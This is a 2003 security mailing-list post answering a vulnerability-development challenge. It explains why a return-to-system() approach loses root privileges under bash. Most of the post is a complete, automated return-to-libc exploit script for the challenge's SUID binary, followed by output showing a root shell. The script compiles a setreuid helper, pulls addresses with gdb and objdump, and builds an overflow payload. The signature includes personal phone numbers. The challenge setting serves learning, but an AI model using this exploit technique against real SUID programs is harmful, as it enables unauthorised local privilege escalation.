Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2 (return-to-libc)
From: Joel Eriksson <je-vulndev () bitnux com>
Date: Sun, 25 May 2003 09:16:04 +0200
Spacewalker and others who did a return-to-libc sploit for vulndev-2.
Returning to system() means your command will be executed like this:
/bin/sh -c blabla
In Linux, /bin/sh is a symlink to bash. Recent versions of bash reset
the EUID to the real UID. Many other shells also reset the EUID, since
it's pretty common to execute /bin/sh in sploits (that's why shellcodes
usually include a setuid-call before the exec, you know).
Jon Erickson AKA Jose Ronnick exploited it "for real" though, and here's
yet another working return-to-libc exploit, which uses a different approach.
As usual, the sploit is fully automated.
[je@vudo ~]$ cat expldev-2.sh
#!/bin/sh
#
# Linux/x86 exploit for vulndev-2. Version 2 (return-to-libc).
#
# 2003-05-25 - Joel Eriksson (je at 0xbadc0ded.org)
#
[ $# -ge 1 ] && vul=$1 || vul=./vulndev-2 ; shift
cat > expldev-2.c << EOF
#include <unistd.h>
#include <errno.h>
int main(void)
{
setreuid(0, 0);
execl("/bin/sh", "sh", NULL);
perror("exec");
return 1;
}
EOF
gcc -o '%s
' expldev-2.c
buf_size=90 # size of buffer
pad_size=2 # align to word boundary
num_reps=32 # &bfp - &buf may be > BFSIZE (padding/alignment)
cp $vul $vul.tmp # Can't trace a SUID-binary, so use a temporary file.
cat > expldev-2.gdb << EOF
file $vul.tmp
b main
r
p/x &execv
q
EOF
addr_printf=0x$(objdump -R $vul | awk '$3 == "printf" { print $1 }')
addr_execv=$(gdb -q -x expldev-2.gdb | sed -n '$,$s/.* = //p')
rm -f expldev-2.gdb $vul.tmp
perl -e 'print "\0\0\0\0" . pack("L", '$[addr_execv]')' > db.log
arg1=$(perl -e '
print "A" x ('$[buf_size + pad_size]') .
pack("L", '$[addr_printf - 4]') x '$num_reps
)
$vul $arg1 ""
[je@vudo ~]$ ./expldev-2.sh
sh-2.05b# whoami
root
sh-2.05b# exit
exit
[je@vudo ~]$
--
Joel Eriksson
-------------------------------------------------
Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
Security Research & Systems Development at Bitnux
PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
-------------------------------------------------
Current thread:
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted), (continued)
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted) Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Robert Hogan (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Gera's Insecure Programing abo7 sin (May 30)
- N00b questions :\ Diode Trnasistor (May 24)
- Re: N00b questions :\ Janus N. (May 24)
- Re: N00b questions :\ northern snowfall (May 24)
- Re: N00b questions :\ Janus N. (May 24)
- Re: N00b questions :\ northern snowfall (May 24)
- Re: N00b questions :\ Diode Trnasistor (May 25)